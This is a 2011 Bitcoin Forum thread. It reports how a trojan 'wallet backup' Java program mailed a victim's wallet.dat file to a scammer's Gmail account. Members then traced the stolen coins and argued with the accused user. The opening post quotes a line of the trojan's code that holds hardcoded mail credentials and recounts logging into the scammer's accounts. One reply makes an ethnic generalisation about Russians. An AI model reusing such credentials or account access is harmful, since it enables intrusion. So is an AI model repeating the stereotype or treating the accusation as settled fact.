Bitcoin Forum
December 05, 2016, 10:26:33 AM *
News: To be able to use the next phase of the beta forum software, please ensure that your email address is correct/functional.
 
   Home   Help Search Donate Login Register  
Pages: [1] 2 3 »  All
  Print  
Author Topic: The case of the Russian Scammer.  (Read 7997 times)
Matt Corallo
Hero Member
*****
Offline Offline

Activity: 751


View Profile
February 19, 2011, 05:21:35 PM
 #1

The following is a write up of the stealing of Blitzboom's wallet by a Russian Scammer (goes by Hummer and Tolsi)'s trojan "wallet backup program".  It is written here for those who are interested to read, both as an account of the stupidity of the scammer, and as a warning to those who download programs from anywhere without running them.
More information can be found in the #bitcoin-dev logs from Feb 19 starting at 12:40.

Blitzboom downloaded a java program claiming to backup your wallet to a dropbox folder, and to a gmail address (see link 1, posted by Hummer).  Really it just sent the wallet.dat file to the gmail account of a russian scammer and deleted it.  Blitzboom then asked on #bitcoin-dev why his client was having problems and posted a copy of the program which he used.
As it turns out, the scammer was so kind as to leave the .java source files in the jar of the program.  ArtForz found a particularly nice line of code:
Code:
return new PasswordAuthentication("safer.mail.ever", "Goran Zvetkovic (22:41:38 17/02/2011)Goran Zvetkovic (22:41:38 17/02/2011)");
Which, as it turns out, was the username and password to our scammer's gmail account.  A bit more digging, and we find that it sends its victim's wallets to bitcoin.backup@gmail.com (which, conveniently, also has the same password).  Thus, some of the members logged into his accounts and were able to download all the scammed wallets.  In the bitcoin.backup account was Blitzboom's wallet and several which held the same accounts, from different times.  The safer.mail.ever account held similar results in the sent mailbox, including more (the oldest of which were sent to tolsi.ru@gmail.com,backupbitcoins@insorg-mail.info, and katyabor1@mail.ru instead of bitcoin.backup@gmail.com).  As it turns out, the duplicated wallets had recieved the bitcoins which were transferred from Blitzboom's wallet.  Most likely, the scammer decided to test his program before releasing it.  

The copy in the bitcoin.backup account was an old copy and one member was able to recover 20 BTC from it (it only had 20, as someone had apparently taken 30 about 17 minutes before.  The copies on safer.mail.ever, on the other hand, held the full 154.36 which Blitzboom had lost (minus the 50 which had already been withdrawn with the other wallet).  The remaining 104.36, as well as the other 20, were returned to Blitzboom at a new address on a new wallet.  That left the 30 withdrawn minutes before.  This one took a bit of sleuthing.  

The 30 was withdrawn to 1N3DDnrpQkUdEhTNGFGU572TpMqfcLwSFD which had, conveniently, also received a payout of 1.1 BTC from slush's pool 30 minutes later.  While waiting for slush to get online, Keefe noticed something very interesting.  In the scammer's wallet, there was an account which is labeled Forum Donate (starting with 1ABvwv, see screenshot 1).  This account just so happens to be one used in the signature of Tolsi (see screenshot 3, link 2).  This clearly links the scammer's wallet to Tolsi.  Thereafter, slush was able to corroborate this in that the email registered to the 1ABvwv... (see log).  

In the end, Tolsi got away with 30 BTC (Blitzboom appears to have been the only one scammed).  Remember, never download a program off the internet, especially one that has access to your bitcoin wallet.  
I'd like to thank ArtForz, Keefe, slush, and several others who wished to remain nameless.
Also, thanks to Blitzboom for the fun it was to steal from a Russian scammer.

Screenshots:
Screenshot 1 (The scammer's Bitcoin wallet)
Screenshot 2 (The scammer's Bitcoin wallet)
Screenshot 3 (Tolsi's donate address)

Links:
Link 1 (The original download post)
Link 2 (Google's Cache of Tolsi's donate address)


Log of #bitcoin-scammer (as to not fill -dev with scam-related messages):
Quote
<BlueMatt> slush, is the 1N3DDnrpQkUdEhTNGFGU572TpMqfcLwSFD address tolsi's?
<BlueMatt> the remaining 30 are in 1N3DDnrpQkUdEhTNGFGU572TpMqfcLwSFD, dont know who it is, thats why I wanted to ask you.
<BlueMatt> Your pool paid him 1.1 earlier today
<Keefe> paid that addr
<slush> BlueMatt: yes
<slush> He changed his pool address to this today
<BlueMatt> dam, well in that case. Sorry Blitzboom, looks like you lost the last 30
<slush> between 9am and 2pm of UTC

Bitcoin Ubuntu PPA maintainer - donate to me personally: 1JBMattRztKDF2KRS3vhjJXA7h47NEsn2c
http://bitcoinrelaynetwork.org maintainer
PGP ID: 07DF 3E57 A548 CCFB 7530  7091 89BB B866 3E2E65CE
1480933593
Hero Member
*
Offline Offline

Posts: 1480933593

View Profile Personal Message (Offline)

Ignore
1480933593
Reply with quote  #2

1480933593
Report to moderator
1480933593
Hero Member
*
Offline Offline

Posts: 1480933593

View Profile Personal Message (Offline)

Ignore
1480933593
Reply with quote  #2

1480933593
Report to moderator
1480933593
Hero Member
*
Offline Offline

Posts: 1480933593

View Profile Personal Message (Offline)

Ignore
1480933593
Reply with quote  #2

1480933593
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1480933593
Hero Member
*
Offline Offline

Posts: 1480933593

View Profile Personal Message (Offline)

Ignore
1480933593
Reply with quote  #2

1480933593
Report to moderator
1480933593
Hero Member
*
Offline Offline

Posts: 1480933593

View Profile Personal Message (Offline)

Ignore
1480933593
Reply with quote  #2

1480933593
Report to moderator
kiba
Legendary
*
Offline Offline

Activity: 980


View Profile
February 19, 2011, 05:26:46 PM
 #2

The image link doesn't work.

Garrett Burgwardt
Sr. Member
****
Offline Offline

Activity: 350



View Profile
February 19, 2011, 05:28:22 PM
 #3

The image links are just formatted improperly. remove the quotation marks and it works fine.
kiba
Legendary
*
Offline Offline

Activity: 980


View Profile
February 19, 2011, 05:29:14 PM
 #4

The image links are just formatted improperly. remove the quotation marks and it works fine.

I do not see question marks.

Matt Corallo
Hero Member
*****
Offline Offline

Activity: 751


View Profile
February 19, 2011, 05:29:36 PM
 #5

My bad, fixed.

Bitcoin Ubuntu PPA maintainer - donate to me personally: 1JBMattRztKDF2KRS3vhjJXA7h47NEsn2c
http://bitcoinrelaynetwork.org maintainer
PGP ID: 07DF 3E57 A548 CCFB 7530  7091 89BB B866 3E2E65CE
Garrett Burgwardt
Sr. Member
****
Offline Offline

Activity: 350



View Profile
February 19, 2011, 05:29:50 PM
 #6

There are some in the link, but reread what you need to remove Wink
Tolsi
Full Member
***
Offline Offline

Activity: 178



View Profile WWW
February 19, 2011, 05:30:20 PM
 #7

Yes, it's my mail. Yesterday I received some spam and deleted it. I did not use a purse until this evening and saw these operations. I thought this 100 btc for my services. But where are they gone? Someone could use my purse?
When I saw this, I swapped my wallet and address in me signature.
I have been slandered, do you want me to be quiet? Looks like a good bases, all of this.

ps Do not make this show. I am an honest man.

Like what am I doing? 1FzSgYpLG4fpy2Q9fKXQsuLxHN81m4P3dR
Matt Corallo
Hero Member
*****
Offline Offline

Activity: 751


View Profile
February 19, 2011, 05:33:28 PM
 #8

Yes tolshi, in an email address with 5 emails, all of them identical, none of them deleted or marked as spam.  All of them are spam.  Very likley.  And the scammer didn't take any of your money but gave all of Blitzboom's to you.

Bitcoin Ubuntu PPA maintainer - donate to me personally: 1JBMattRztKDF2KRS3vhjJXA7h47NEsn2c
http://bitcoinrelaynetwork.org maintainer
PGP ID: 07DF 3E57 A548 CCFB 7530  7091 89BB B866 3E2E65CE
kiba
Legendary
*
Offline Offline

Activity: 980


View Profile
February 19, 2011, 05:34:58 PM
 #9

Yes, it's my mail. Yesterday I received some spam and deleted it. I did not use a purse until this evening and saw these operations. I thought this 100 btc for my services. But where are they gone? Someone could use my purse?
When I saw this, I swapped my wallet and address in me signature.
I have been slandered, do you want me to be quiet? Looks like a good bases, all of this.

Unless the scammer executed a convoluted plot to implicate you in the scam..it's very unlikely that you are not the scammer.

(Also, you and the scammer use the same word, "purse")

Tolsi
Full Member
***
Offline Offline

Activity: 178



View Profile WWW
February 19, 2011, 05:43:03 PM
 #10

Unless the scammer executed a convoluted plot to implicate you in the scam..it's very unlikely that you are not the scammer.

(Also, you and the scammer use the same word, "purse")
it's very convoluted plot. for me too.
Many Russian users managed to get confidence in my services for Bitcoin. Also, I help many people on the forum with their minners. I'm good, rly! Please remove my name from this story, I want to keep it clean.
ps I use translate.google.ru  Wink As I write myself, I use wallet
ps changed the password in the mail.

Like what am I doing? 1FzSgYpLG4fpy2Q9fKXQsuLxHN81m4P3dR
Blitz­
Donator
Legendary
*
Offline Offline

Activity: 1596


"Cut Your Loose"


View Profile
February 19, 2011, 05:47:25 PM
 #11

I’ve learnt my lesson from it, I guess.

The awesome thing is how everyone worked together to get me back my BTCs and make this possible. Thanks to all of you.

What happened here is very interesting because it shows that, even without official instititions, the community itself can possibly identify and punish wrongdoers and refund victims, although it was Tolsi’s stupidity which made this easy.

If you ever want to establish yourself SOME trust in this community, send the 30 BTC back to me, to this particular address: 12EWfVucUxuf2m7tWyoit5UMSVhQZ68yBC

If I happen to get the payment, I will announce that and shut up about it, and people will either forget about it or choose to forgive you.

"Bitcoin had been transformed from an anarachistic challenge to the financial status quo, to the crypto spawn of Satan, fuelled by cut-throat greed and delusions of avarice." - MatTheCat
"these people don't seem to want to stop till Bitcoin is completely destroyed and left like an old cum rag in the corner of the room." - ShroomsKit
kiba
Legendary
*
Offline Offline

Activity: 980


View Profile
February 19, 2011, 05:51:44 PM
 #12

it's very convoluted plot. for me too.
Many Russian users managed to get confidence in my services for Bitcoin. Also, I help many people on the forum with their minners. I'm good, rly! Please remove my name from this story, I want to keep it clean.
ps I use translate.google.ru  Wink As I write myself, I use wallet
ps changed the password in the mail.

Until I hear other Russians testify, I don't believe you.

Tolsi
Full Member
***
Offline Offline

Activity: 178



View Profile WWW
February 19, 2011, 05:55:37 PM
 #13

Until I hear other Russians testify, I don't believe you.
I communicate with the moderator of the Russian section, I hope he will help us to sort out.
I earn bitcoins very slowly (5-7 par day), if it will help remove all of this lies in my name, I thought a couple of days I'll give them to you. Huh I can send you 1.95btc now, other later, suit you?

Like what am I doing? 1FzSgYpLG4fpy2Q9fKXQsuLxHN81m4P3dR
Nefario
Hero Member
*****
Offline Offline

Activity: 602


GLBSE Support support@glbse.com


View Profile WWW
February 19, 2011, 05:58:52 PM
 #14

This is so interesting.

PGP key id at pgp.mit.edu 0xA68F4B7C

To get help and support for GLBSE please email support@glbse.com
Matt Corallo
Hero Member
*****
Offline Offline

Activity: 751


View Profile
February 19, 2011, 06:03:10 PM
 #15

If an admin does want to comment, the IP Address of the Russian scammer (from Gmail's logs) was 91.203.66.66.  If you want to prove your innocence, have a forum admin post that Tolsi has NEVER used that IP Address to post on here (I'm assuming logs are kept).  Until then, I think the evidence speaks for itself. 

Bitcoin Ubuntu PPA maintainer - donate to me personally: 1JBMattRztKDF2KRS3vhjJXA7h47NEsn2c
http://bitcoinrelaynetwork.org maintainer
PGP ID: 07DF 3E57 A548 CCFB 7530  7091 89BB B866 3E2E65CE
Tolsi
Full Member
***
Offline Offline

Activity: 178



View Profile WWW
February 19, 2011, 06:05:48 PM
 #16

it's my ip address now.  Shocked and from what ip visited this Hummer? ip is my ISP, many may use it.
it's someone from my local network. so, ban me.

Like what am I doing? 1FzSgYpLG4fpy2Q9fKXQsuLxHN81m4P3dR
Hal
VIP
Sr. Member
*
Offline Offline

Activity: 314



View Profile
February 19, 2011, 06:15:26 PM
 #17

Why are so many Russians dishonest? Is it because of all those years of communism, a system built on lies? Or does it go deeper in the Russian culture? Are Russian children even taught by their parents not to lie? Are they taught sayings like "honesty is the best policy", and stories like George Washington and the cherry tree?

Hal Finney
LZ
Staff
Legendary
*
Offline Offline

Activity: 1456


Satoshi everywhere!


View Profile WWW
February 19, 2011, 06:35:06 PM
 #18

From this moment I am representing Tolsi's interests. Can someone provide me all evidences of the Tolsi's guilt?

Hal, we had a very criminal 90's. Cry

"Never invest unless you can afford to lose your entire investment." © S3052
mail2345
Newbie
*
Offline Offline

Activity: 16


View Profile
February 19, 2011, 06:46:52 PM
 #19

Hal: Or maybe it's a disproportionate sample sort of thing. Maybe honest Russians don't like the bother of the language barrier to trade with English speakers, and dishonest Russians just deal with it because hey, there's tons of money in scamming.

BTC Address: 12TJbeJ2aCzCppJ6m1yYoPUdp9EHWRTQNv
LZ
Staff
Legendary
*
Offline Offline

Activity: 1456


Satoshi everywhere!


View Profile WWW
February 19, 2011, 07:33:23 PM
 #20

Few screenshots that I want to see:
  • the screenshot confirming the link between tolsi.ru[at]gmail.com
    (which is owned by Tolsi) and bitcoin.backup[at]gmail.com or katyabor1[at]mail.ru
  • the ip address that was used by Hummer (btw he use the different time zone in the forums profile)
  • and also the date and the time when the Tolsi's wallet file was sent to the address of the fraudster

"Never invest unless you can afford to lose your entire investment." © S3052
Pages: [1] 2 3 »  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!